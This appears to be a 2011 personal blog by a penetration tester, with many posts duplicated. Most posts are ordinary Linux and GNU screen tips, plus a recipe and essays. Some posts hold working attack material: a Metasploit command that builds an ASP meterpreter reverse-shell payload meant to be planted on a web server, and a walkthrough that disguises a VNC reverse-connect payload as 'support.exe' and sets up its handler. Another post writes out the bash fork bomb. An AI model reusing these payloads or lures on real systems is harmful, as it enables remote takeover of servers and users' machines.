Most people know about uname -a to get a good amount of information. However, if you want an easy way to discover the distro/version you can run:
cat /etc/issue
The problem is that /etc/issue was never meant to keep track of the release version. So it may not exist on certain machines. I believe the most reliable method would be to:
cat /etc/*release
or
lsb_release -a
Sunday, December 25, 2011
Wednesday, December 14, 2011
Downloading DefCon Videos - The Easy Way
curl & wget is your friend.
The following commands will get you the download links for the different defcon videos they allow for download on their site.
Defcon 19
curl "http://defcon.org/html/links/dc-archives/dc-19-archive.html" | grep -o "https.*\.m4v"
Defcon 18
curl "http://defcon.org/html/links/dc-archives/dc-18-archive.html" | grep -o "https.*\.m4v"
Defcon 17
curl "http://defcon.org/html/links/dc-archives/dc-17-archive.html" | grep -o "https.*Video.*\.m4v\"
Defcon 16
curl "http://defcon.org/html/links/dc-archives/dc-16-archive.html" | grep -o "https.*m4v\"" | cut -d ' ' -f1 | tr -d '"'
Defcon 15
curl "http://defcon.org/html/links/dc-archives/dc-15-archive.html" | grep -o "http://media.*\.m4v"
Defcon 14
curl "http://defcon.org/html/links/dc-archives/dc-14-archive.html" | grep -o "https.*\.m4v"
Defcon 13
curl "http://defcon.org/html/links/dc-archives/dc-13-archive.html" | grep -o "https.*\.m4v"
Defcon 12
curl "http://defcon.org/html/links/dc-archives/dc-12-archive.html" | grep -o "https.*\.m4v"
Defcon 11
curl "http://defcon.org/html/links/dc-archives/dc-11-archive.html" | grep -o "https.*\.m4v"
Defcon 10
curl "http://defcon.org/html/links/dc-archives/dc-10-archive.html" | grep -o "https.*\.m4v"
Defcon 9
curl "http://defcon.org/html/links/dc-archives/dc-9-archive.html" | grep -o "https.*\.m4v"
Defcon 8
curl "http://defcon.org/html/links/dc-archives/dc-8-archive.html" | grep -o "https.*\.m4v"
Defcon 7
curl "http://defcon.org/html/links/dc-archives/dc-7-archive.html" | grep -o "https.*\.m4v"
The following commands will get you the download links for the different defcon videos they allow for download on their site.
Defcon 19
curl "http://defcon.org/html/links/dc-archives/dc-19-archive.html" | grep -o "https.*\.m4v"
Defcon 18
curl "http://defcon.org/html/links/dc-archives/dc-18-archive.html" | grep -o "https.*\.m4v"
Defcon 17
curl "http://defcon.org/html/links/dc-archives/dc-17-archive.html" | grep -o "https.*Video.*\.m4v\"
Defcon 16
curl "http://defcon.org/html/links/dc-archives/dc-16-archive.html" | grep -o "https.*m4v\"" | cut -d ' ' -f1 | tr -d '"'
Defcon 15
curl "http://defcon.org/html/links/dc-archives/dc-15-archive.html" | grep -o "http://media.*\.m4v"
Defcon 14
curl "http://defcon.org/html/links/dc-archives/dc-14-archive.html" | grep -o "https.*\.m4v"
Defcon 13
curl "http://defcon.org/html/links/dc-archives/dc-13-archive.html" | grep -o "https.*\.m4v"
Defcon 12
curl "http://defcon.org/html/links/dc-archives/dc-12-archive.html" | grep -o "https.*\.m4v"
Defcon 11
curl "http://defcon.org/html/links/dc-archives/dc-11-archive.html" | grep -o "https.*\.m4v"
Defcon 10
curl "http://defcon.org/html/links/dc-archives/dc-10-archive.html" | grep -o "https.*\.m4v"
Defcon 9
curl "http://defcon.org/html/links/dc-archives/dc-9-archive.html" | grep -o "https.*\.m4v"
Defcon 8
curl "http://defcon.org/html/links/dc-archives/dc-8-archive.html" | grep -o "https.*\.m4v"
Defcon 7
curl "http://defcon.org/html/links/dc-archives/dc-7-archive.html" | grep -o "https.*\.m4v"
Wednesday, November 30, 2011
Tuesday, November 29, 2011
Prepending text to a file
no mo' temp files
echo lol > rofl.txt
echo wut | cat - rofl.txt | tee rofl.txt > /dev/null
this makes cat concatenate firstly the stdin, which in this case is the piped output from echo, and then the file you prepend it to then redirects that stdout to tee which outputs it to the original file.
Move running process to screen
ctrl+z #to suspend
bg #to background
screen retty $PID #to move the PID to screen
install retty using apt-get
Python & ruby saves json output
At first I was disgusted by json output. then python made it pretty. thanks python
cat t2.json | python -mjson.tool
you can do the same thing with ruby albeit longer:
cat t2.json | ruby -e "require 'rubygems'; require 'json'; puts JSON.pretty_generate(JSON[STDIN.read]);"
Dumping GNU screen output
I like to have a copy of my screen sessions as a text file for future reference and reporting when i do my pentests.
while in screen type c-a :hardcopy -h dumpofwindow1
this should create a file "dumpofwindow1" in the home dir.
You can view it with cat
*-h dumps the entire scrollback buffer. its improtant to remember that its useless if you are in less or vi or something similar.
Wednesday, November 23, 2011
Understanding the BASH fork bomb
:(){ :|:& }
is a good old fashion troll against noobs in linux. The above command basically sets up a function named ":" - This trips up noobies because they dont quite get what that is, the dont realize that functions can be named almost anything, not just conventional names like myFunction().
The core of the function basically sets up a pipe and runs in the background that constantly runs and runs again. Thereby using up all the resources on the machine extremely quickly. The funny part is if they try to perform some action to free up resources, the function simply uses up those resources again.
Its a classic.
Ghetto locate
some boxes dont have locate/updatedb on them for indexed searching of the filesystem. This sucks when you need to look for several files. You can create your own ghetto version by:
find / -print > filesystemlisting
and then grepping through that for your entries.
the find command just outputs the entire filesystem names to that file as absolute paths.
easy smeasy
Thursday, November 10, 2011
Forever Alone Teriyaki Egg Fried Rice
Serves one.
1/2 cup of rice
3/4 cup of water
2 eggs
teriyaki sauce
put the rice and water in your rice cooker. push button. wait. wait some more. when its done, wait 10 more minutes so it actually fucking softens. meanwhile waiting, go to stove. put oil in pan, turn on heat. meanwhile heating, crack eggs into bowl, beat, add some salt. pour eggs into pan, stir with the energy of a thousand suns. bam bitch you just made scrambled eggs. turn off heat, let eggs sit on warm stovetop until rice is done. scoop rice into bowl. scoop eggs into bowl. pour teriyaki sauce like a boss. FEED
Wednesday, November 9, 2011
ASP Encoded Meterpreter Payload
Here is the line to create a meterpreter payload that has been outputted as an ASP page. Upload/include this into webserver to have them call back to you:
msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 R | msfencode -t asp > lolwut.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 R | msfencode -t asp > lolwut.asp
Thursday, November 3, 2011
Parse .gnmap into separate files
I wanted each host line of my .gnmap file to be parsed into separate files with the ports as the contents, each port on a separate line. below is the one liner:
replace local1.gnmap with the name of your gnmap file. This should product output like so:
cat 192.168.5.254
22/open/tcp//ssh//Cisco SSH 1.25 (protocol 1.99)
23/open/tcp//telnet//Cisco router
443/open/tcp//ssl|http//Cisco IOS http config/
This may mean nothing to you, but for me, its going to make grepping through recon SOOOO much simpler.
for i in `cat local1.gnmap | cut -d ' ' -f 2`; do grep $i local1.gnmap |awk 'BEGIN {FS=": "} {for(i=1;i<=NF;i++)print $i}'|grep open|awk 'BEGIN {FS="/, "} {for(i=1;i<=NF;i++)print $i}' >> $i;done
cat 192.168.5.254
22/open/tcp//ssh//Cisco SSH 1.25 (protocol 1.99)
23/open/tcp//telnet//Cisco router
443/open/tcp//ssl|http//Cisco IOS http config/
This may mean nothing to you, but for me, its going to make grepping through recon SOOOO much simpler.
Monday, October 24, 2011
Grabbing external IP
There are NUMEROUS different ways of grabbing your external IP/other info. The way I prefer is using ifconfig.me.
curl ifconfig.me
my IP as reported by ifconfig.me
it also has multiple switches like /ua for user agent string
Go to http://ifconfig.me for a full list of switches
curl ifconfig.me
my IP as reported by ifconfig.me
it also has multiple switches like /ua for user agent string
Go to http://ifconfig.me for a full list of switches
Friday, October 7, 2011
cURL line to post data to pastebin
TL;DR curl -d 'paste_code="she said wut wut, catsinthebutt"' 'http://pastebin.com/api_public.php'
you have to send a POST to http://pastebin.com/api_public.php with the data you want applied in the 'paste_code' attribute. In this case, "she said wut wut, catsinthebutt" is the thing that will be posted to pastebin.
pipe that to pbcopy on a mac and bam your pastebin url is in your pastebin (yo dawg)
i said wut wut!
you have to send a POST to http://pastebin.com/api_public.php with the data you want applied in the 'paste_code' attribute. In this case, "she said wut wut, catsinthebutt" is the thing that will be posted to pastebin.
pipe that to pbcopy on a mac and bam your pastebin url is in your pastebin (yo dawg)
i said wut wut!
Friday, September 23, 2011
Debranding BackTrack 5
I love backtrack 5, so much so I want to customize it with my own wallpapers and splash screens and such. Below I will illustrate what you need to know to change:
1. The bootsplash image (the text only screen on top of the background, it will be the first one that comes up)
2. The plymouth image (the image that flashes on the screen for a few seconds before going back to the bootsplash image)
3. The wallpaper image (simplest to change, its the wallpaper on the desktop)
Firstly, the bootsplash image:
The bootsplash image is by far the hardest to modify because it takes quite a few steps, although is simple in retrospect. BT5 uses a utility called "bootsplash" to generate the image that is behind the superimposed text window when you first boot up. This is the screen where you initially log in with root:toor login, the same screen where you type startx to put into the gui.
Bootsplash imagefiles are basically the original image with added metadata tagged onto it. This metadata is placed within the bootsplash imagefile using the splash utility along with a simple text config file. The current imagefile is located at /opt/bootsplash/bootsplash. In order to modify the bootsplash image, you must regenerate this file. You do this using the bootsplash utility "splash". This utility comes with the installation of the bootsplash utilities archive located below:
http://www.bootsplash.org/Userspace
Download, extract, and compile the utilities into some folder. Navigate to this folder and run "./splash" - you should recieve the following output:
root@bt:~/temp/bootsplash-3.0.7/Utilities# ./splash
Usage: ./splash -s [-u unit] -n [cfgfile]
This means it should be working fine. So, like I said before, this splash utility requires one file as input, the config file (i will describe it later). This config file contains the metadata along with the location of the image to use.
----------------------
So lets start with the whole point of this, go get your jpg image you want to use as the background. got it? good. NOTE* the instructions im giving expect your file to be 1024x768 and 96DPI. Now that you have your jpg file somewhere you need to create a splash config file to go along with it. I have pasted my file below:
# config file version
version=3
# should the picture be displayed?
state=1
# fgcolor is the text forground color.
# bgcolor is the text background (i.e. transparent) color.
fgcolor=7
bgcolor=0
# (tx, ty) are the (x, y) coordinates of the text window in pixels.
# tw/th is the width/height of the text window in pixels.
tx=80
ty=140
tw=865
th=560
# name of the picture file (full path recommended)
jpeg=/root/temp/tw/bootsplash.jpg
silentjpeg=/root/temp/tw/bootsplash.jpg
progress_enable=0
overpaintok=1
So as you can see above, you have to specify the path of the jpg along with the dimensions of the text box that the console output will be placed in (the dimensions MUST be within the limits of the image otherwise it wont work). Ok so now you have the config pointing to the image. now lets pass it to the splash utility to generate our bootsplash imagefile.
./splash -s -f /root/temp/tw/bootsplash-1024x768.cfg > /opt/bootsplash/bootsplash.fancy
cp /opt/bootsplash/bootsplash /opt/bootsplash/bootsplash.old-bt5
cp /opt/bootsplash/bootsplash.fancy /opt/bootsplash/bootsplash
The above commands generate the bootsplash imagefile, place it in /opt/bootsplash, backup the old one, and copy in the new one. This way, if you need to go back all you have to do is copy back the old file and continue.
Now you run "fix-splash" to copy the new file into initrd. Fix splash is a bash script that the bt5 guys seem to have included to fix and old issue with splash fucking up for some reason.
now reboot and enjoy :D
--------------------------------
Changing the Plymouth image:
This process is simpler. First, backup the old plymouth bt5 splash:
"cp /lib/plymouth/themes/simple/bt5_1024x768.png /lib/plymouth/themes/simple/bt5_1024x768.png.backup"
Now what I did was open the bt5 plymouth image in gimp, paste my new image over it, and save it. I wasnt sure if there was any retarded file issues I had to deal with so i figured I wouldnt try to find out...
Now run "update-alternatives --config default.plymouth" and then "update-initramfs -u", reboot and everything will look fucked up. log into root, run "fix-splash" like before, reboot and now it should be fixed.
-------------------------------
Changing the wallpaper image:
This is the simplest:
"gconftool-2 --type string --set /desktop/gnome/background/picture_filename /root/Desktop/wp.jpg"
bam. that should be an instant change.
have fun, and if anything doesnt work try google first, then message me ;D
1. The bootsplash image (the text only screen on top of the background, it will be the first one that comes up)
2. The plymouth image (the image that flashes on the screen for a few seconds before going back to the bootsplash image)
3. The wallpaper image (simplest to change, its the wallpaper on the desktop)
Firstly, the bootsplash image:
The bootsplash image is by far the hardest to modify because it takes quite a few steps, although is simple in retrospect. BT5 uses a utility called "bootsplash" to generate the image that is behind the superimposed text window when you first boot up. This is the screen where you initially log in with root:toor login, the same screen where you type startx to put into the gui.
Bootsplash imagefiles are basically the original image with added metadata tagged onto it. This metadata is placed within the bootsplash imagefile using the splash utility along with a simple text config file. The current imagefile is located at /opt/bootsplash/bootsplash. In order to modify the bootsplash image, you must regenerate this file. You do this using the bootsplash utility "splash". This utility comes with the installation of the bootsplash utilities archive located below:
http://www.bootsplash.org/Userspace
Download, extract, and compile the utilities into some folder. Navigate to this folder and run "./splash" - you should recieve the following output:
root@bt:~/temp/bootsplash-3.0.7/Utilities# ./splash
Usage: ./splash -s [-u unit] -n [cfgfile]
This means it should be working fine. So, like I said before, this splash utility requires one file as input, the config file (i will describe it later). This config file contains the metadata along with the location of the image to use.
----------------------
So lets start with the whole point of this, go get your jpg image you want to use as the background. got it? good. NOTE* the instructions im giving expect your file to be 1024x768 and 96DPI. Now that you have your jpg file somewhere you need to create a splash config file to go along with it. I have pasted my file below:
# config file version
version=3
# should the picture be displayed?
state=1
# fgcolor is the text forground color.
# bgcolor is the text background (i.e. transparent) color.
fgcolor=7
bgcolor=0
# (tx, ty) are the (x, y) coordinates of the text window in pixels.
# tw/th is the width/height of the text window in pixels.
tx=80
ty=140
tw=865
th=560
# name of the picture file (full path recommended)
jpeg=/root/temp/tw/bootsplash.jpg
silentjpeg=/root/temp/tw/bootsplash.jpg
progress_enable=0
overpaintok=1
So as you can see above, you have to specify the path of the jpg along with the dimensions of the text box that the console output will be placed in (the dimensions MUST be within the limits of the image otherwise it wont work). Ok so now you have the config pointing to the image. now lets pass it to the splash utility to generate our bootsplash imagefile.
./splash -s -f /root/temp/tw/bootsplash-1024x768.cfg > /opt/bootsplash/bootsplash.fancy
cp /opt/bootsplash/bootsplash /opt/bootsplash/bootsplash.old-bt5
cp /opt/bootsplash/bootsplash.fancy /opt/bootsplash/bootsplash
The above commands generate the bootsplash imagefile, place it in /opt/bootsplash, backup the old one, and copy in the new one. This way, if you need to go back all you have to do is copy back the old file and continue.
Now you run "fix-splash" to copy the new file into initrd. Fix splash is a bash script that the bt5 guys seem to have included to fix and old issue with splash fucking up for some reason.
now reboot and enjoy :D
--------------------------------
Changing the Plymouth image:
This process is simpler. First, backup the old plymouth bt5 splash:
"cp /lib/plymouth/themes/simple/bt5_1024x768.png /lib/plymouth/themes/simple/bt5_1024x768.png.backup"
Now what I did was open the bt5 plymouth image in gimp, paste my new image over it, and save it. I wasnt sure if there was any retarded file issues I had to deal with so i figured I wouldnt try to find out...
Now run "update-alternatives --config default.plymouth" and then "update-initramfs -u", reboot and everything will look fucked up. log into root, run "fix-splash" like before, reboot and now it should be fixed.
-------------------------------
Changing the wallpaper image:
This is the simplest:
"gconftool-2 --type string --set /desktop/gnome/background/picture_filename /root/Desktop/wp.jpg"
bam. that should be an instant change.
have fun, and if anything doesnt work try google first, then message me ;D
Thursday, September 22, 2011
Psychological Porno
I have always had spouts of ideas/revelations/epiphanies since i can remember, and they always were gone once i had them. Only recently have i decided to start recording said ideas. Its simple, I downloaded a voice recorder app on my phone, and when I get an awesome new invention idea, or a philosophical idea, or when i start ranting, I hit the record button.
There are several benefits to doing this:
1. You can hear yourself (effectively) from an outside perspective once enough time has passed. This is awesome since you cant remember exactly what you were thinking at that point, so you hear yourself the exact way others do. This is a very rare experience that i believe would benefit anyone.
2. You have a record of your ideas for the future, immortalized in digital media, you can copy and share that shit anywhere. Although, I would be very careful who you share your ideas and secrets with. People could exploit the things you hold dearest, and that, could seriously fuck with you.
3. The third is what I like to call psychological porno. I call it that because playing back your hopes/dreams/realizations/etc after a long span of time really brings you back to the person you wish to be. Everyone strays from that person from time to time, but its important for us to be able to realize what path we wanted to take in the first place.
There are several benefits to doing this:
1. You can hear yourself (effectively) from an outside perspective once enough time has passed. This is awesome since you cant remember exactly what you were thinking at that point, so you hear yourself the exact way others do. This is a very rare experience that i believe would benefit anyone.
2. You have a record of your ideas for the future, immortalized in digital media, you can copy and share that shit anywhere. Although, I would be very careful who you share your ideas and secrets with. People could exploit the things you hold dearest, and that, could seriously fuck with you.
3. The third is what I like to call psychological porno. I call it that because playing back your hopes/dreams/realizations/etc after a long span of time really brings you back to the person you wish to be. Everyone strays from that person from time to time, but its important for us to be able to realize what path we wanted to take in the first place.
Thursday, September 8, 2011
GNU screen and osx mouse scrolling
I use a mac. I use screen. I want mac mouse scrolling in screen. This is how I do it:
My main gripe with screen is its scrollback buffer. As a pentester, the output i receive is obviously incredibly important, so an easy way to view it is imperative. Apparently there is a way to hack mouse scrolling into terminal. Basically it utilizes a plugin written for a scripting agent that interfaces into terminal.app.
1. install SIMBL: http://www.culater.net/software/SIMBL/SIMBL.php
2. install MouseTerm: https://bitheap.org/mouseterm/
3. restart terminal, make sure "send mouse events" is checked in the "shell" menu option.
4. start screen
5. ???
6. profit
Basically its a plugin that converts the scroll up movement of your mouse/touchpad to up/down arrow keys and sends that to the terminal. This effectively allow you to quickly scroll through screens scrollback buffer quickly by flicking your fingers.
awwwww yeahhhhh
Monday, August 1, 2011
How to wget/curl UPS tracking page
One of my job functions is to keep track of many servers out in the field. So i decided to make my life easy and create a script that will automatically track the status of the the servers. Luckily, this is very easy to accomplish:
simply curl or wget the following page and parse out the sections you want.
http://wwwapps.ups.com/WebTracking/processInputRequest?TypeOfInquiryNumber=T&InquiryNumber1=1Z000000000000
Where '1Z000000000000' is your tracking number.
Once I get my script fully completed I will post it here.
simply curl or wget the following page and parse out the sections you want.
http://wwwapps.ups.com/WebTracking/processInputRequest?TypeOfInquiryNumber=T&InquiryNumber1=1Z000000000000
Where '1Z000000000000' is your tracking number.
Once I get my script fully completed I will post it here.
Wednesday, July 27, 2011
Meterpreter VNC payload for IT support
So, the first place that ever got me a job was this small independent UPS store in chicago. They had no tech person whatsoever and nobody was really technically inclined. I got a job as a normal associate. I saw that they had multiple technical issues, and I recognized the fact that I could solve them. So I stepped up and starting taking care of all of their tech issues (Remember: I wasnt hired to do any of that). I became their IT administrator for their 4 stores. I handled everything they needed and some things i thought they should have.
Long story short, I moved onto multiple other jobs that were more tech focused. But they are now without a tech person. Incidentally, im still their tech person lol. They call me all the time to help with some printer or network connection or driver issue or some other IT support issue. I had set up logmein accounts for most of the machines when I worked for them. But this was a long time ago and they got wiped out several times. ENTER THE BLACKHAT SOLUTION.
I figure: hey, if I can get passwords and credit cards from multi-billion dollar corporations, getting a VNC session to some shitty POS behind a nat should be flippin' easy.
It is. Here's how:
Tech Support via Metasploit:
I'm assuming you already have MSF and apache installed and working properly on your machine. If you dont, google it, its easy to do.
1. generate the VNC payload with the proper settings to connect back:
msfpayload windows/vncinject/reverse_tcp LHOST=myvps.com X > /var/www/support.exe
2. start the multihandler on your VPS to listen for the VNC connection
msfconsole
use exploit/multi/handler
set PAYLOAD windows/vncinject/reverse_tcp
set LHOST myvps.com
exploit
3. tell your person to go to myvps.com/support.exe and run the executable. The VNC payload should connect back to your VPS and you should get output similar to the following:
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to 2.2.2.2
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[-] Failed to launch vncviewer. Is it installed and in your path?
[*] Session 2 created in the background.
4. I do everything via command line so I have to forward the localhost only port to an internet accessible one by using SSH, this is how:
ssh -L :5901:localhost:5900 username@localhost
5. now run netstat -ntlp to make sure 5901 is listening on the public interface (0.0.0.0).
6. now use a VNC client to connect to your VPS on port 5901. (chickenoftheVNC, set the "display" to 1)
7. BAM you should have their desktop now.
If you have any questions, just ask.
Long story short, I moved onto multiple other jobs that were more tech focused. But they are now without a tech person. Incidentally, im still their tech person lol. They call me all the time to help with some printer or network connection or driver issue or some other IT support issue. I had set up logmein accounts for most of the machines when I worked for them. But this was a long time ago and they got wiped out several times. ENTER THE BLACKHAT SOLUTION.
I figure: hey, if I can get passwords and credit cards from multi-billion dollar corporations, getting a VNC session to some shitty POS behind a nat should be flippin' easy.
It is. Here's how:
Tech Support via Metasploit:
I'm assuming you already have MSF and apache installed and working properly on your machine. If you dont, google it, its easy to do.
1. generate the VNC payload with the proper settings to connect back:
msfpayload windows/vncinject/reverse_tcp LHOST=myvps.com X > /var/www/support.exe
2. start the multihandler on your VPS to listen for the VNC connection
msfconsole
use exploit/multi/handler
set PAYLOAD windows/vncinject/reverse_tcp
set LHOST myvps.com
exploit
3. tell your person to go to myvps.com/support.exe and run the executable. The VNC payload should connect back to your VPS and you should get output similar to the following:
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to 2.2.2.2
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[-] Failed to launch vncviewer. Is it installed and in your path?
[*] Session 2 created in the background.
4. I do everything via command line so I have to forward the localhost only port to an internet accessible one by using SSH, this is how:
ssh -L :5901:localhost:5900 username@localhost
5. now run netstat -ntlp to make sure 5901 is listening on the public interface (0.0.0.0).
6. now use a VNC client to connect to your VPS on port 5901. (chickenoftheVNC, set the "display" to 1)
7. BAM you should have their desktop now.
If you have any questions, just ask.
Wednesday, July 6, 2011
FUCK i love grep
grep -o has saved me soooo many times.
Here is an example of it, I am using curl to grab the last 5 links from a twitter page:
without the grep -o section, it would simply return the tweet as one line with you needing to pull out the links somehow.
Just be careful, because i discovered that twitter only allows you to pull 150 tweets in an hour on some accounts.
Here is an example of it, I am using curl to grab the last 5 links from a twitter page:
curl http://twitter.com/statuses/user_timeline/pastebinleaks.xml?count=5 -s| grep "" | sed 's/.*\(.*\)<\/text>.*/\1/' | grep -o "http://pastebin.* "
Just be careful, because i discovered that twitter only allows you to pull 150 tweets in an hour on some accounts.
Sunday, June 12, 2011
Thank you for visiting our site! You must register an account to breathe. Would you like our newsletter?
Heres an idea, create a alternate persona you use for all those bajillion accounts. Website got hacked? pfft, big deal, you got my bullshit account, grats.
Seriously, take a second and think up a new identity:
-Name
-Address
-Occupation
-Salary
-Password
-Wife? Kids? pet? mistress? mistress!
This is your new account, grats, use it with peace of mind.
Seriously, take a second and think up a new identity:
-Name
-Address
-Occupation
-Salary
-Password
-Wife? Kids? pet? mistress? mistress!
This is your new account, grats, use it with peace of mind.
Saturday, June 11, 2011
Changing GNU Screen's Escape Sequence
It seems kind of dumb to me for several different programs to have the same escape sequence. Ever tried to use minicom in a screen session? Or try to go to beginning of line in bash? Not fun.
You have to modify your .screenrc file to have the following line:
escape escapekey metakey
I changed mine to C-` (backtick). So my escape line looks like this:
I got the information from here:
http://ubuntuforums.org/archive/index.php/t-498675.html
You have to modify your .screenrc file to have the following line:
escape escapekey metakey
I changed mine to C-` (backtick). So my escape line looks like this:
escape ^``
I got the information from here:
http://ubuntuforums.org/archive/index.php/t-498675.html
MS08-067 Affected Machines
Microsoft's account of affected version of windows. Handy to have.
http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
Don't Be A Prick
There is an attitude that is very prevalent in the infosec community. That is arrogance. People who have been told too many times that they are "uber smart leet hackers" and this praise creates an aura that repulses anyone who can see past the facade. Here is a simple idea to ponder on; Arrogance = insecurty + fear.
These people's greatest fears are to be regarded as normal. They are terrified at the thought of their people not respecting them. They fear the judgments of others. And that, my friends is why an arrogant person is the weakest form. A meek individual may be scared of what others think, but at least they wont throw someone in front of a bus to show their muscles.
So let me end on a few simple notes. There was a time you knew nothing, that time has never went away. Your pride simply outgrew your knowledge. If you are looking for a dose of modesty, then here is a spoonful:
One day, everything you know, everything you have, and everything you love will be gone. On that day, there will only be one thing that remains; your memory. You better make DAMN sure that memory of you is a good one. That is your heaven. That is your hell. That is your soul.
Imagine if there was no more tomorrow for you; everyone else goes on, but you don't. Your possessions get divided up and taken by others. Your loved ones will move on and concern themselves with someone else. But there is one thing that remains in the minds of everyone. Your influence, your ideals, your philosophies carry on in those who cared. Those who were touched by your mind. Touched in a positive way, not an arrogant, self-serving, or egotistical way. Not a way that makes people feel like an idiot or a moron that doesn't deserve his own voice.
Next time you are faced with a situation in which you can raise someone up or bring them down, remember the truth of your life - that it ends.
These people's greatest fears are to be regarded as normal. They are terrified at the thought of their people not respecting them. They fear the judgments of others. And that, my friends is why an arrogant person is the weakest form. A meek individual may be scared of what others think, but at least they wont throw someone in front of a bus to show their muscles.
So let me end on a few simple notes. There was a time you knew nothing, that time has never went away. Your pride simply outgrew your knowledge. If you are looking for a dose of modesty, then here is a spoonful:
One day, everything you know, everything you have, and everything you love will be gone. On that day, there will only be one thing that remains; your memory. You better make DAMN sure that memory of you is a good one. That is your heaven. That is your hell. That is your soul.
Imagine if there was no more tomorrow for you; everyone else goes on, but you don't. Your possessions get divided up and taken by others. Your loved ones will move on and concern themselves with someone else. But there is one thing that remains in the minds of everyone. Your influence, your ideals, your philosophies carry on in those who cared. Those who were touched by your mind. Touched in a positive way, not an arrogant, self-serving, or egotistical way. Not a way that makes people feel like an idiot or a moron that doesn't deserve his own voice.
Next time you are faced with a situation in which you can raise someone up or bring them down, remember the truth of your life - that it ends.
Wednesday, June 8, 2011
uniq not working? yes it is
Remember this simple fact and you wont feel like an idiot (like i did about 10minutes ago). Lets say you have a text file with the following:
cats
cats
if you run that file through sort -u you will get the exact same output. Sound crazy? yeah thats what i thought, until you see the invisible. Whitespace. the second "cats" has a space after it. The space at the end makes that line completely different from the previous "cats".
Use the following line to eliminate the whitespace:
Now, run it through sort -u and be a happy camper.
kthnxbai
cats
cats
if you run that file through sort -u you will get the exact same output. Sound crazy? yeah thats what i thought, until you see the invisible. Whitespace. the second "cats" has a space after it. The space at the end makes that line completely different from the previous "cats".
Use the following line to eliminate the whitespace:
sed 's/ //g' filename
Now, run it through sort -u and be a happy camper.
kthnxbai
Monday, May 23, 2011
Removing leading whitespace from file
Sometimes clients like to annoy me and send IPs in a "fancy" format with tabs and space and crap..ugh. I'm a one entry per line kind of guy. So I paste the entries into vim and I want to get rid of leading whitespace. This is the command in vim:
EXPLAIN THIS BULLSHIT:
vim has sed-like regex recognition. This command tells vim to search (%s) for lines begining (^) with whitespace (\s), and include the rest of the whitespaces directly after the first one (*). Next, delete them (//). Now do this globally (g). By default, it will only match the first instance of the regex, g means "do this globally".
:%s/^\s*//g
EXPLAIN THIS BULLSHIT:
vim has sed-like regex recognition. This command tells vim to search (%s) for lines begining (^) with whitespace (\s), and include the rest of the whitespaces directly after the first one (*). Next, delete them (//). Now do this globally (g). By default, it will only match the first instance of the regex, g means "do this globally".
Thursday, May 19, 2011
Add Timestamps to bash history
Found the solution here:
http://linux.byexamples.com/archives/467/list-command-line-history-with-timestamp/
TL;DR
add:
to your .bash_profile
http://linux.byexamples.com/archives/467/list-command-line-history-with-timestamp/
TL;DR
add:
export HISTTIMEFORMAT="%F %T "
to your .bash_profile
Monday, May 9, 2011
Ghetto-ized IP address range generator
Once i got my head out of my ass, I figured out an uber easy way to generate and sort a long list of IP addresses:
The only thing you would need to edit would be the original echo line to match the range you are trying to generate.
echo -e "\n"192.168.{1..255}.{1..255} #generates the actual IPs using Bash brace expansion
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n #sorts the IPs into the proper order (optional)
>> hosts # output to file!
end result:
echo -e "\n"192.168.{1..255}.{1..255} | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n >> hosts
The only thing you would need to edit would be the original echo line to match the range you are trying to generate.
Thursday, May 5, 2011
SSH and GatewayPorts configuration
I love SSH, like alot, but I was having a problem with lately. Specifically the problem was with the security of remote forwarded ports (-R). I was told that by default SSH only allows remote ports to be bound to the local interface for security reasons. I understand that, completely. The problem is that wanted to be able to use my VPS's SSH connections like a bouncer. I wanted to be able to type:
and have the connection go through vpsserver into the server behind it. In effect, making vpsserver a type of central hub for reverse ssh connections. You can think of it almost like a ghetto botnet.
I found out that all i had to do was change GatewayPorts to "yes" in /etc/ssh/sshd_config and it would work if I issued the following command on the BACK server.
All was well with the world for a while. Then my paranoia was sinking in. I didnt want someone to portscan my vps and see that i have 20 different ports open from reverse ssh connections. What was I to do? Well it turns out that GatewayPorts has 3 different settings; yes, no, and clientspecified.
no(default) = force remote port forwardings to only be accessible to localhost
yes = Force remote port forwardings to public interface (technically no, but in essence thats what it does)
clientspecified = the client decides which to choose
So i changed GatewayPorts to clientspecified and experimented. If you typed the remote forward command we typed in earlier:
we would get a port remotely bound to the vpsserver's localhost address. This would force you to first log into the VPS and then log into the 2222 on localhost.
BUT, if you want the port to be bound publicly on vpsserver, it only takes 1 more character. pay attention closely:
notice that ":" in from of the 2222? that essentially tells ssh to bind it to the public interface*.
Now i have two very similar commands to do two importantly different things. I am a happy camper.
*technically it tells SSH to bind it to all interfaces, which consequently includes the external facing one :)
ssh account@vpssserver.net -p2222
and have the connection go through vpsserver into the server behind it. In effect, making vpsserver a type of central hub for reverse ssh connections. You can think of it almost like a ghetto botnet.
I found out that all i had to do was change GatewayPorts to "yes" in /etc/ssh/sshd_config and it would work if I issued the following command on the BACK server.
ssh account@vpsserver.net -R 2222:localhost:22
All was well with the world for a while. Then my paranoia was sinking in. I didnt want someone to portscan my vps and see that i have 20 different ports open from reverse ssh connections. What was I to do? Well it turns out that GatewayPorts has 3 different settings; yes, no, and clientspecified.
no(default) = force remote port forwardings to only be accessible to localhost
yes = Force remote port forwardings to public interface (technically no, but in essence thats what it does)
clientspecified = the client decides which to choose
So i changed GatewayPorts to clientspecified and experimented. If you typed the remote forward command we typed in earlier:
ssh account@vpsserver.net -R 2222:localhost:22
we would get a port remotely bound to the vpsserver's localhost address. This would force you to first log into the VPS and then log into the 2222 on localhost.
BUT, if you want the port to be bound publicly on vpsserver, it only takes 1 more character. pay attention closely:
ssh account@vpsserver.net -R :2222:localhost:22
notice that ":" in from of the 2222? that essentially tells ssh to bind it to the public interface*.
Now i have two very similar commands to do two importantly different things. I am a happy camper.
*technically it tells SSH to bind it to all interfaces, which consequently includes the external facing one :)
vi & vim acting retarded
Ever just fire up a fresh VM or log into a box and try to edit a file with vi and the backspace/arrow keys are acting retarded? It happened it me, I noticed it was because there was no .vimrc file.
